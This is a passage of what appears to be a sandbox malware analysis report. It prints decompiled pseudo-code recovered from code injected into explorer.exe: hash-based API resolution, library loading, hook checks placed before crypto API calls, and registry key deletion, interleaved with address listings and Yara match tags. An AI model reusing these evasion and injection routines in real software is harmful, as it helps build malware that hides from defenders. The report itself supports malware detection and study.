    				if( *_a20 != 1) {
    					__eflags =  *_a20 - 2;
    					if( *_a20 != 2) {
    						__eflags =  *_a20 - 3;
    						if( *_a20 != 3) {
    							goto L40;
    						}
    						_v28 = 3;
    						_v64 = _a20 + 4;
    						goto L9;
    					}
    					_v28 = 0;
    				} else {
    					_v28 = 1;
    				}
    			}
    0x007c5d2b
    0x007c5d32
    0x007c6332
    0x007c6338
    0x007c6338
    0x007c5d3a
    0x007c5d41
    0x007c5d81
    0x007c5d83
    0x007c5d86
    0x007c5d93
    0x007c5d96
    0x007c5d9a
    0x00000000
    0x00000000
    0x007c5da6
    0x007c5db5
    0x007c5dbd
    0x007c5dce
    0x007c5dd9
    0x007c5de9
    0x007c5df9
    0x007c5e0f
    0x007c5e25
    0x007c5e2d
    0x007c5e37
    0x007c5e47
    0x007c5e47
    0x007c5e5a
    0x007c5e72
    0x007c5e77
    0x007c5e98
    0x007c5ea0
    0x007c5eaa
    0x007c5eba
    0x007c5ecb
    0x007c5ed6
    0x007c5ed9
    0x007c5eed
    0x007c5ef2
    0x007c5f06
    0x007c5f0b
    0x007c5f1f
    0x007c5f31
    0x007c5f36
    0x007c5f4a
    0x007c5f51
    0x007c5f57
    0x007c5f59
    0x007c5f62
    0x007c5f71
    0x007c5f71
    0x007c5f7a
    0x007c5f85
    0x007c5f7c
    0x007c5f7c
    0x007c5f7c
    0x007c5fa3
    0x007c5fa8
    0x007c5faf
    0x007c5fba
    0x007c5fb1
    0x007c5fb1
    0x007c5fb1
    0x007c5fc1
    0x007c5fc6
    0x007c5fcc
    0x007c5fd1
    0x007c5fd7
    0x007c5fdc
    0x007c5fe4
    0x007c5fea
    0x007c6005
    0x007c6013
    0x007c601a
    0x007c601c
    0x007c6032
    0x007c6037
    0x007c604b
    0x007c604b
    0x007c6050
    0x007c6054
    0x007c60bd
    0x007c60c6
    0x007c60ce
    0x007c60d3
    0x007c60d5
    0x007c6056
    0x007c6068
    0x007c607a
    0x007c608b
    0x007c609d
    0x007c60a9
    0x007c60a9
    0x007c60e8
    0x007c60f1
    0x007c60f8
    0x007c610a
    0x007c610f
    0x007c6118
    0x007c611d
    0x007c6133
    0x007c6138
    0x007c613f
    0x00000000
    0x00000000
    0x007c614f
    0x007c6152
    0x007c6154
    0x007c6157
    0x007c6166
    0x007c616e
    0x007c6172
    0x007c6174
    0x00000000
    0x00000000
    0x007c617a
    0x007c617e
    0x00000000
    0x00000000
    0x007c6180
    0x007c6184
    0x007c61c5
    0x007c61c9
    0x007c61e4
    0x007c61ec
    0x007c620a
    0x007c621d
    0x007c6232
    0x007c6247
    0x007c625c
    0x007c6279
    0x007c628d
    0x007c6292
    0x007c62ad
    0x007c62b5
    0x007c62bf
    0x007c62d2
    0x007c62d7
    0x007c62d9
    0x007c6300
    0x007c630f
    0x007c6313
    0x007c62db
    0x007c62de
    0x007c62e8
    0x007c62f2
    0x007c62f9
    0x007c62f9
    0x007c61cb
    0x007c61ce
    0x007c61ce
    0x00000000
    0x007c61c9
    0x007c618c
    0x007c6191
    0x00000000
    0x00000000
    0x007c61a5
    0x007c61b8
    0x007c61c0
    0x007c61c0
    0x00000000
    0x007c60fa
    0x007c60fd
    0x007c631a
    0x007c631d
    0x007c6325
    0x007c632d
    0x00000000
    0x007c632d
    0x007c60f8
    0x007c5d49
    0x007c5d57
    0x007c5d5a
    0x007c5d66
    0x007c5d69
    0x00000000
    0x00000000
    0x007c5d6f
    0x007c5d7c
    0x00000000
    0x007c5d7c
    0x007c5d5e
    0x007c5d4b
    0x007c5d4b
    0x007c5d4b

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 58%
    			E007C8A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				void* _t12;
    				intOrPtr _t23;
    				void* _t24;
    
    				_t12 = _a8 - 2;
    				if(_t12 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t12 == 0xf) {
    						E007C78FC(_a16 & 0x80000000, _t24);
    						_v8 = 1;
    					} else {
    						_t23 =  *0x7cb300(_a4, _a8, _a12, _a16); // executed
    						_v8 = _t23;
    					}
    				}
    				return _v8;
    			}
    0x007c8a51
    0x007c8a54
    0x007c8a5f
    0x007c8a67
    0x007c8a56
    0x007c8a59
    0x007c8a74
    0x007c8a79
    0x007c8a5b
    0x007c8a92
    0x007c8a98
    0x007c8a98
    0x007c8a59
    0x007c8aa1

    APIs
    • PostQuitMessage.USER32(00000000), ref: 007C8A5F
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C795A
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C796D
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 007C8A92
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 84%
    			E007C3988(CHAR* __eax) {
    				CHAR* _v8;
    				signed char _v12;
    				void* _v16;
    				struct _WIN32_FIND_DATAA _v336;
    				signed int _t16;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t16 = FindFirstFileA(_v8,  &_v336); // executed
    				_v16 = _t16;
    				asm("sbb eax, eax");
    				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
    				FindClose(_v16);
    				return _v12;
    			}
    0x007c3991
    0x007c3996
    0x007c39a4
    0x007c39aa
    0x007c39b6
    0x007c39b8
    0x007c39bf
    0x007c39cb

    APIs
    • FindFirstFileA.KERNELBASE(?,?), ref: 007C39A4
    • FindClose.KERNEL32(000000FF), ref: 007C39BF
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C18A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
    				long* _v8;
    				BYTE* _v12;
    				int _v16;
    				int _v20;
    				int _t21;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x7cb500)) != 0xe9) {
    					_t21 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4); // executed
    					_v20 = _t21;
    				}
    				return _v20;
    			}
    0x007c18a6
    0x007c18a9
    0x007c18ac
    0x007c18b7
    0x007c18d1
    0x007c18d7
    0x007c18d7
    0x007c18e0

    APIs
    • CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 007C18D1
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 58%
    			E007C8A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				intOrPtr _v8;
    				intOrPtr _v117;
    				void* _t15;
    				intOrPtr _t26;
    				void* _t27;
    
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				_t15 = _a12 - 2;
    				if(_t15 == 0) {
    					PostQuitMessage(0);
    					_v8 = 0;
    				} else {
    					if(_t15 == 0xf) {
    						E007C78FC(_a16 & 0x80000000, _t27);
    						_v8 = 1;
    					} else {
    						_t26 =  *0x7cb300(_a4, _a8, _a12, _a16); // executed
    						_v8 = _t26;
    					}
    				}
    				return _v8;
    			}
    0x007c8a45
    0x007c8a47
    0x007c8a51
    0x007c8a54
    0x007c8a5f
    0x007c8a67
    0x007c8a56
    0x007c8a59
    0x007c8a74
    0x007c8a79
    0x007c8a5b
    0x007c8a92
    0x007c8a98
    0x007c8a98
    0x007c8a59
    0x007c8aa1

    APIs
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C795A
      • Part of subcall function 007C78FC: SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C796D
    • PostQuitMessage.USER32(00000000), ref: 007C8A5F
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 007C8A92
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C17E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
    				HCRYPTPROV* _v8;
    				char* _v12;
    				char* _v16;
    				int _v20;
    				int _t19;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x7cb4fc)) != 0xe9) {
    					_t19 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4); // executed
    					_v20 = _t19;
    				}
    				return _v20;
    			}
    0x007c17ee
    0x007c17f1
    0x007c17f4
    0x007c17ff
    0x007c1815
    0x007c181b
    0x007c181b
    0x007c1824

    APIs
    • CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 007C1815
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 100%
    			E007C2574(intOrPtr __eax) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				CHAR* _t492;
    				CHAR* _t500;
    				struct HINSTANCE__* _t564;
    				CHAR* _t567;
    				struct HINSTANCE__* _t568;
    				CHAR* _t571;
    				CHAR* _t587;
    				CHAR* _t669;
    				CHAR* _t677;
    				CHAR* _t685;
    				struct HINSTANCE__* _t686;
    				CHAR* _t693;
    				CHAR* _t699;
    				struct HINSTANCE__* _t700;
    				CHAR* _t707;
    				intOrPtr _t712;
    				CHAR* _t713;
    				struct HINSTANCE__* _t714;
    				CHAR* _t755;
    				struct HINSTANCE__* _t756;
    
    				_v8 = __eax;
    				_v12 = E007C24F8();
    				 *0x7cb11c = E007C1994(_v12, 0xc8ac8026);
    				 *0x7cb120 = E007C1994(_v12, 0x4b935b8e);
    				 *0x7cb1d0 = E007C1994(_v12, 0x78b00c7e);
    				 *0x7cb144 = E007C1994(_v12, 0x25447ac6);
    				 *0x7cb148 = E007C1994(_v12, 0xf50b872);
    				 *0x7cb160 = E007C1994(_v12, 0x9e6fa842);
    				 *0x7cb1bc = E007C1994(_v12, 0x7d544dbd);
    				 *0x7cb124 = E007C1994(_v12, 0x1fc0eaee);
    				 *0x7cb384 = E007C1994(_v12, 0x270118e2);
    				 *0x7cb498 = E007C1994(_v12, 0x4ae7572b);
    				 *0x7cb138 = E007C1994(_v12, 0x81f0f0c9);
    				 *0x7cb140 = E007C1994(_v12, 0x95fb6a02);
    				 *0x7cb334 = E007C1994(_v12, 0x70f6fe31);
    				 *0x7cb338 = E007C1994(_v12, 0x399354ce);
    				 *0x7cb128 = E007C1994(_v12, 0xa45b370a);
    				 *0x7cb208 = E007C1994(_v12, 0x2b00b870);
    				 *0x7cb1c4 = E007C1994(_v12, 0x4fba916c);
    				 *0x7cb2a4 = E007C1994(_v12, 0xc54374f3);
    				 *0x7cb2a0 = E007C1994(_v12, 0x9c700049);
    				 *0x7cb29c = E007C1994(_v12, 0x4f6ca717);
    				 *0x7cb2d8 = E007C1994(_v12, 0x67ecde97);
    				 *0x7cb2dc = E007C1994(_v12, 0xfdc94385);
    				 *0x7cb2e0 = E007C1994(_v12, 0x68807354);
    				 *0x7cb2e4 = E007C1994(_v12, 0x84d25ea);
    				 *0x7cb2e8 = E007C1994(_v12, 0xfc7a6efd);
    				 *0x7cb2ec = E007C1994(_v12, 0x5550b067);
    				 *0x7cb2f0 = E007C1994(_v12, 0xaebea6a);
    				 *0x7cb12c = E007C1994(_v12, 0x46318ac7);
    				 *0x7cb130 = E007C1994(_v12, 0x49a1374a);
    				 *0x7cb134 = E007C1994(_v12, 0xae17c571);
    				 *0x7cb150 = E007C1994(_v12, 0xe61874b3);
    				 *0x7cb154 = E007C1994(_v12, 0x3a7a7478);
    				 *0x7cb158 = E007C1994(_v12, 0x533d3b41);
    				 *0x7cb15c = E007C1994(_v12, 0x99a4299d);
    				 *0x7cb164 = E007C1994(_v12, 0xbea0bf35);
    				 *0x7cb168 = E007C1994(_v12, 0x9d00a761);
    				 *0x7cb188 = E007C1994(_v12, 0x9abfb8a6);
    				 *0x7cb194 = E007C1994(_v12, 0x6b416786);
    				 *0x7cb198 = E007C1994(_v12, 0x774393e8);
    				 *0x7cb19c = E007C1994(_v12, 0x2ee4f10d);
    				 *0x7cb1a0 = E007C1994(_v12, 0x19f78c90);
    				 *0x7cb1a4 = E007C1994(_v12, 0xd89ad05);
    				 *0x7cb1a8 = E007C1994(_v12, 0xc930ea1e);
    				 *0x7cb18c = E007C1994(_v12, 0x5bc1d14f);
    				 *0x7cb1e0 = E007C1994(_v12, 0x77cd9567);
    				 *0x7cb1f0 = E007C1994(_v12, 0x32432444);
    				 *0x7cb1f4 = E007C1994(_v12, 0x279dead7);
    				 *0x7cb1f8 = E007C1994(_v12, 0x7b4842c1);
    				 *0x7cb1fc = E007C1994(_v12, 0xae52c609);
    				 *0x7cb200 = E007C1994(_v12, 0xbf78969c);
    				 *0x7cb204 = E007C1994(_v12, 0xbb74a4a2);
    				 *0x7cb22c = E007C1994(_v12, 0x464871f3);
    				 *0x7cb190 = E007C1994(_v12, 0x9bd6888f);
    				 *0x7cb20c = E007C1994(_v12, 0x5c17ec75);
    				 *0x7cb210 = E007C1994(_v12, 0x58fe7abe);
    				 *0x7cb254 = E007C1994(_v12, 0x768aa260);
    				 *0x7cb25c = E007C1994(_v12, 0xef0a25b7);
    				 *0x7cb260 = E007C1994(_v12, 0xbc262395);
    				 *0x7cb264 = E007C1994(_v12, 0xe8bf6dad);
    				 *0x7cb268 = E007C1994(_v12, 0x5cd9430);
    				 *0x7cb26c = E007C1994(_v12, 0xaef7cbf1);
    				 *0x7cb274 = E007C1994(_v12, 0x475587b7);
    				 *0x7cb278 = E007C1994(_v12, 0x3def91ba);
    				 *0x7cb408 = E007C1994(_v12, 0xda81bc58);
    				 *0x7cb40c = E007C1994(_v12, 0xf3b84f05);
    				 *0x7cb410 = E007C1994(_v12, 0x392b6027);
    				 *0x7cb414 = E007C1994(_v12, 0x7b2d2505);
    				 *0x7cb314 = E007C1994(_v12, 0xeeba5eba);
    				 *0x7cb2a8 = E007C1994(_v12, 0x89b968d2);
    				 *0x7cb2c0 = E007C1994(_v12, 0x7e92ca65);
    				 *0x7cb2f4 = E007C1994(_v12, 0x4c1077d6);
    				 *0x7cb31c = E007C1994(_v12, 0x84033deb);
    				 *0x7cb320 = E007C1994(_v12, 0x725cb0a1);
    				 *0x7cb250 = E007C1994(_v12, 0x52ac19c);
    				 *0x7cb318 = E007C1994(_v12, 0x23ebe98b);
    				 *0x7cb464 = E007C1994(_v12, 0x3b3ee0f9);
    				 *0x7cb468 = E007C1994(_v12, 0x8d5a50dc);
    				 *0x7cb46c = E007C1994(_v12, 0x8d5a50ca);
    				 *0x7cb470 = E007C1994(_v12, 0x5e7ee0d0);
    				 *0x7cb474 = E007C1994(_v12, 0x69260152);
    				 *0x7cb478 = E007C1994(_v12, 0x9c480e24);
    				 *0x7cb47c = E007C1994(_v12, 0x5aa7e70b);
    				 *0x7cb488 = E007C1994(_v12, 0xe74f57ee);
    				 *0x7cb48c = E007C1994(_v12, 0x2d40b8f0);
    				 *0x7cb490 = E007C1994(_v12, 0xae17c071);
    				 *0x7cb494 = E007C1994(_v12, 0x515be757);
    				 *0x7cb49c = E007C1994(_v12, 0x1297812c);
    				 *0x7cb4a0 = E007C1994(_v12, 0x2f2feeda);
    				 *0x7cb4a4 = E007C1994(_v12, 0x81f0f0df);
    				 *0x7cb4a8 = E007C1994(_v12, 0xf3fd1c3);
    				 *0x7cb4ac = E007C1994(_v12, 0xef48e03a);
    				 *0x7cb4b0 = E007C1994(_v12, 0xfb0730c);
    				 *0x7cb4b4 = E007C1994(_v12, 0xa9de6f5a);
    				 *0x7cb4b8 = E007C1994(_v12, 0x723eb0d5);
    				 *0x7cb4bc = E007C1994(_v12, 0x487fe16b);
    				 *0x7cb4c0 = E007C1994(_v12, 0x8f8f114);
    				 *0x7cb4c4 = E007C1994(_v12, 0x3d9972f5);
    				 *0x7cb4c8 = E007C1994(_v12, 0x6fb89af0);
    				 *0x7cb4cc = E007C1994(_v12, 0xc09d5d66);
    				 *0x7cb4d0 = E007C1994(_v12, 0x2ca2b7e6);
    				 *0x7cb4d4 = E007C1994(_v12, 0x7b88bf3b);
    				 *0x7cb4d8 = E007C1994(_v12, 0xaa1de02f);
    				 *0x7cb4dc = E007C1994(_v12, 0xa48d6762);
    				 *0x7cb4e0 = E007C1994(_v12, 0x3a35705f);
    				 *0x7cb4e8 = E007C1994(_v12, 0x697a6afe);
    				 *0x7cb4ec = E007C1994(_v12, 0x95902b19);
    				 *0x7cb4f0 = E007C1994(_v12, 0x1295012c);
    				 *0x7cb4f4 = E007C1994(_v12, 0x2891ae7a);
    				 *0x7cb4f8 = E007C1994(_v12, 0x831a3927);
    				 *0x7cb23c = E007C1994(_v12, 0xd0498cd4);
    				 *0x7cc22c = E007C1994(_v12, 0xd0498cc2);
    				_t492 =  *0x7ca084; // 0x7c1bf0
    				_v12 = LoadLibraryA(_t492);
    				 *0x7cb230 = E007C1994(_v12, 0xa638ce5f);
    				 *0x7cb234 = E007C1994(_v12, 0xbc44a131);
    				 *0x7cb238 = E007C1994(_v12, 0xf6edf382);
    				_t500 =  *0x7ca080; // 0x7c1be8
    				_v12 = LoadLibraryA(_t500);
    				 *0x7cb2fc = E007C1994(_v12, 0x1ab922bf);
    				 *0x7cb2f8 = E007C1994(_v12, 0xa8afd1f3);
    				 *0x7cb300 = E007C1994(_v12, 0xc6ce9b8a);
    				 *0x7cb304 = E007C1994(_v12, 0xf26817eb);
    				 *0x7cb308 = E007C1994(_v12, 0x7506e960);
    				 *0x7cb30c = E007C1994(_v12, 0xbf7efb5a);
    				 *0x7cb310 = E007C1994(_v12, 0x4baed1c8);
    				 *0x7cb484 = E007C1994(_v12, 0x7396104b);
    				 *0x7cb480 = E007C1994(_v12, 0xb800c8a6);
    				 *0x7cb388 = E007C1994(_v12, 0x8616ab9b);
    				 *0x7cb38c = E007C1994(_v12, 0xb4584dda);
    				 *0x7cb1b4 = E007C1994(_v12, 0x6c7f716f);
    				 *0x7cb1b0 = E007C1994(_v12, 0x252b53b);
    				 *0x7cb2ac = E007C1994(_v12, 0xd36ceaf0);
    				 *0x7cb2b0 = E007C1994(_v12, 0xd7a87c3a);
    				 *0x7cb2b4 = E007C1994(_v12, 0xc45d9631);
    				 *0x7cb2b8 = E007C1994(_v12, 0x4baed1de);
    				 *0x7cb2bc = E007C1994(_v12, 0x8ebef5b1);
    				 *0x7cb270 = E007C1994(_v12, 0xea3af0d7);
    				 *0x7cb418 = E007C1994(_v12, 0x484007c);
    				 *0x7cb41c = E007C1994(_v12, 0x58a81c29);
    				 *0x7cb420 = E007C1994(_v12, 0xcacd450);
    				 *0x7cb424 = E007C1994(_v12, 0xabbc680d);
    				 *0x7cb42c = E007C1994(_v12, 0x7cbd2247);
    				 *0x7cb428 = E007C1994(_v12, 0xbdb70517);
    				 *0x7cb430 = E007C1994(_v12, 0x1d6c998b);
    				 *0x7cb434 = E007C1994(_v12, 0xa2f65ba2);
    				 *0x7cb438 = E007C1994(_v12, 0xad4ffcd5);
    				 *0x7cb43c = E007C1994(_v12, 0xc8a274ac);
    				 *0x7cb440 = E007C1994(_v12, 0x5fda1871);
    				 *0x7cb444 = E007C1994(_v12, 0xc0d4187d);
    				_t564 = LoadLibraryA("Psapi"); // executed
    				_v12 = _t564;
    				 *0x7cb4e4 = E007C1994(_v12, 0x860331a8);
    				_t567 =  *0x7ca0a4; // 0x7c1c40
    				_t568 = LoadLibraryA(_t567); // executed
    				_v12 = _t568;
    				 *0x7cb178 = E007C1994(_v12, 0xa60c5f05);
    				_t571 =  *0x7ca0d0; // 0x7c1cac
    				_v12 = LoadLibraryA(_t571);
    				 *0x7cb3ec = E007C1994(_v12, 0x5af0017c);
    				 *0x7cb3f0 = E007C1994(_v12, 0x5e10f525);
    				 *0x7cb3f4 = E007C1994(_v12, 0x48b87efc);
    				 *0x7cb3f8 = E007C1994(_v12, 0xdf91a857);
    				 *0x7cb3fc = E007C1994(_v12, 0x9e90b462);
    				 *0x7cb400 = E007C1994(_v12, 0x4894dafc);
    				 *0x7cb404 = E007C1994(_v12, 0x59012669);
    				_t587 =  *0x7ca0e0; // 0x7c1d08
    				_v12 = LoadLibraryA(_t587);
    				 *0x7cb330 = E007C1994(_v12, 0xb9d41c2f);
    				 *0x7cb1b8 = E007C1994(_v12, 0xb96ca1c0);
    				 *0x7cb1c0 = E007C1994(_v12, 0x28e9e291);
    				 *0x7cb1c8 = E007C1994(_v12, 0x1d1f334a);
    				 *0x7cb1cc = E007C1994(_v12, 0x5cb5ef72);
    				 *0x7cb2c8 = E007C1994(_v12, 0xce303c3a);
    				 *0x7cb2c4 = E007C1994(_v12, 0x3e68cfc6);
    				 *0x7cb2cc = E007C1994(_v12, 0xd4ecc759);
    				 *0x7cb2d0 = E007C1994(_v12, 0xd21e3d01);
    				 *0x7cb2d4 = E007C1994(_v12, 0xad0c9f7e);
    				 *0x7cb4fc = E007C1994(_v12, 0x8ad7de34);
    				 *0x7cb500 = E007C1994(_v12, 0x78660dbe);
    				 *0x7cb504 = E007C1994(_v12, 0xcebf13be);
    				 *0x7cb508 = E007C1994(_v12, 0xd4b3d42);
    				 *0x7cb50c = E007C1994(_v12, 0x72760bb8);
    				 *0x7cb448 = E007C1994(_v12, 0x3c4de260);
    				 *0x7cb44c = E007C1994(_v12, 0xf837a387);
    				 *0x7cb450 = E007C1994(_v12, 0xc3f46335);
    				 *0x7cb454 = E007C1994(_v12, 0xa5ffa46e);
    				 *0x7cb458 = E007C1994(_v12, 0x453db143);
    				 *0x7cb45c = E007C1994(_v12, 0x37a53419);
    				 *0x7cb460 = E007C1994(_v12, 0xcebf17e6);
    				 *0x7cb17c = E007C1994(_v12, 0xaad67ff8);
    				 *0x7cb180 = E007C1994(_v12, 0x3ef2d3dd);
    				 *0x7cb184 = E007C1994(_v12, 0x90a097e6);
    				 *0x7cb16c = E007C1994(_v12, 0x7a2167dc);
    				 *0x7cb170 = E007C1994(_v12, 0x1b3d12b9);
    				 *0x7cb174 = E007C1994(_v12, 0x80dbbe07);
    				 *0x7cb1ac = E007C1994(_v12, 0x398c5285);
    				 *0x7cb1dc = E007C1994(_v12, 0x560c7c4a);
    				 *0x7cb1d8 = E007C1994(_v12, 0xdb355534);
    				 *0x7cb1d4 = E007C1994(_v12, 0x3e400fd6);
    				 *0x7cb1e4 = E007C1994(_v12, 0xee6ab5d);
    				 *0x7cb1e8 = E007C1994(_v12, 0x1802e7c8);
    				 *0x7cb1ec = E007C1994(_v12, 0xf65a7d95);
    				 *0x7cb224 = E007C1994(_v12, 0xb8538a52);
    				 *0x7cb228 = E007C1994(_v12, 0xccd03c3a);
    				 *0x7cb328 = E007C1994(_v12, 0x6d523bdd);
    				 *0x7cb32c = E007C1994(_v12, 0xf2f9de08);
    				 *0x7cb324 = E007C1994(_v12, 0xce30283a);
    				_t669 =  *0x7ca094; // 0x7c1c20
    				_v12 = LoadLibraryA(_t669);
    				 *0x7cb214 = E007C1994(_v12, 0x3caa9945);
    				 *0x7cb218 = E007C1994(_v12, 0x5a56b493);
    				 *0x7cb258 = E007C1994(_v12, 0x7dfb3ef0);
    				_t677 =  *0x7ca088; // 0x7c1bf8
    				_v12 = LoadLibraryA(_t677);
    				 *0x7cb14c = E007C1994(_v12, 0xf2276995);
    				 *0x7cb21c = E007C1994(_v12, 0xc95d8550);
    				 *0x7cb220 = E007C1994(_v12, 0x570bc899);
    				_t685 =  *0x7ca098; // 0x7c1c28
    				_t686 = LoadLibraryA(_t685); // executed
    				_v12 = _t686;
    				 *0x7cb27c = E007C1994(_v12, 0x368435be);
    				 *0x7cb280 = E007C1994(_v12, 0xf341d5cf);
    				 *0x7cb284 = E007C1994(_v12, 0xedb3159d);
    				_t693 =  *0x7ca1b8; // 0x7c1eec
    				_v12 = LoadLibraryA(_t693);
    				 *0x7cb288 = E007C1994(_v12, 0x3184919f);
    				 *0x7cb28c = E007C1994(_v12, 0x39aedd1b);
    				_t699 =  *0x7ca0a0; // 0x7c1c38
    				_t700 = LoadLibraryA(_t699); // executed
    				_v12 = _t700;
    				 *0x7cb290 = E007C1994(_v12, 0x8a94f707);
    				 *0x7cb294 = E007C1994(_v12, 0x7aa45c7a);
    				 *0x7cb298 = E007C1994(_v12, 0x4e26c00f);
    				_t707 =  *0x7ca0cc; // 0x7c1ca4
    				_v12 = LoadLibraryA(_t707);
    				 *0x7cb33c = E007C1994(_v12, 0x233e6d0f);
    				_t712 = E007C1994(_v12, 0xbf821ad);
    				 *0x7cb340 = _t712;
    				if(_v8 != 0) {
    					_t713 =  *0x7ca1b0; // 0x7c1edc
    					_t714 = LoadLibraryA(_t713); // executed
    					_v12 = _t714;
    					 *0x7cb34c = E007C1994(_v12, 0xd939f838);
    					 *0x7cb344 = E007C1994(_v12, 0x9400a044);
    					 *0x7cb348 = E007C1994(_v12, 0xee9bf475);
    					 *0x7cb3a4 = E007C1994(_v12, 0xe797764);
    					 *0x7cb3a8 = E007C1994(_v12, 0xedd8fe8a);
    					 *0x7cb3ac = E007C1994(_v12, 0xe5971f6);
    					 *0x7cb3b0 = E007C1994(_v12, 0x5d99726a);
    					 *0x7cb3b4 = E007C1994(_v12, 0x1f935b1d);
    					 *0x7cb3b8 = E007C1994(_v12, 0xfc7af16a);
    					 *0x7cb3bc = E007C1994(_v12, 0x939d7d9c);
    					 *0x7cb3c0 = E007C1994(_v12, 0xcdde757d);
    					 *0x7cb3c4 = E007C1994(_v12, 0xc5a7764);
    					 *0x7cb3c8 = E007C1994(_v12, 0x9e7d3188);
    					 *0x7cb3cc = E007C1994(_v12, 0x3c797b7a);
    					 *0x7cb3d0 = E007C1994(_v12, 0x4dfc1f3b);
    					 *0x7cb3d4 = E007C1994(_v12, 0x8e9bf775);
    					 *0x7cb3d8 = E007C1994(_v12, 0x8fb8b5bd);
    					 *0x7cb3dc = E007C1994(_v12, 0xb909d088);
    					 *0x7cb3e0 = E007C1994(_v12, 0xf44318c6);
    					 *0x7cb3e4 = E007C1994(_v12, 0x95e4a5d7);
    					_t755 =  *0x7ca1b4; // 0x7c1ee4
    					_t756 = LoadLibraryA(_t755); // executed
    					_v12 = _t756;
    					 *0x7cb13c = E007C1994(_v12, 0xaa91290b);
    					 *0x7cb350 = E007C1994(_v12, 0x8593dd7);
    					 *0x7cb354 = E007C1994(_v12, 0x6ae49924);
    					 *0x7cb358 = E007C1994(_v12, 0x7314fb0c);
    					 *0x7cb35c = E007C1994(_v12, 0xb87dbd66);
    					 *0x7cb360 = E007C1994(_v12, 0x2f5ce027);
    					 *0x7cb364 = E007C1994(_v12, 0xa3a80ab6);
    					 *0x7cb368 = E007C1994(_v12, 0xddcb15d);
    					 *0x7cb36c = E007C1994(_v12, 0x8733d614);
    					 *0x7cb370 = E007C1994(_v12, 0xfde87743);
    					 *0x7cb390 = E007C1994(_v12, 0x1a212962);
    					 *0x7cb394 = E007C1994(_v12, 0x9f13856a);
    					 *0x7cb398 = E007C1994(_v12, 0xbe618d3e);
    					 *0x7cb39c = E007C1994(_v12, 0x1510002f);
    					 *0x7cb3a0 = E007C1994(_v12, 0x7edec584);
    					 *0x7cb380 = E007C1994(_v12, 0xaa912901);
    					 *0x7cb374 = E007C1994(_v12, 0x2ae71934);
    					 *0x7cb378 = E007C1994(_v12, 0x1ad09c78);
    					 *0x7cb37c = E007C1994(_v12, 0x9ef6461);
    					_t712 = E007C1994(_v12, 0x57fbc0dd);
    					 *0x7cb3e8 = _t712;
    				}
    				return _t712;
    			}
    0x007c257a
    0x007c2582
    0x007c2592
    0x007c25a4
    0x007c25b6
    0x007c25c8
    0x007c25da
    0x007c25ec
    0x007c25fe
    0x007c2610
    0x007c2622
    0x007c2634
    0x007c2646
    0x007c2658
    0x007c266a
    0x007c267c
    0x007c268e
    0x007c26a0
    0x007c26b2
    0x007c26c4
    0x007c26d6
    0x007c26e8
    0x007c26fa
    0x007c270c
    0x007c271e
    0x007c2730
    0x007c2742
    0x007c2754
    0x007c2766
    0x007c2778
    0x007c278a
    0x007c279c
    0x007c27ae
    0x007c27c0
    0x007c27d2
    0x007c27e4
    0x007c27f6
    0x007c2808
    0x007c281a
    0x007c282c
    0x007c283e
    0x007c2850
    0x007c2862
    0x007c2874
    0x007c2886
    0x007c2898
    0x007c28aa
    0x007c28bc
    0x007c28ce
    0x007c28e0
    0x007c28f2
    0x007c2904
    0x007c2916
    0x007c2928
    0x007c293a
    0x007c294c
    0x007c295e
    0x007c2970
    0x007c2982
    0x007c2994
    0x007c29a6
    0x007c29b8
    0x007c29ca
    0x007c29dc
    0x007c29ee
    0x007c2a00
    0x007c2a12
    0x007c2a24
    0x007c2a36
    0x007c2a48
    0x007c2a5a
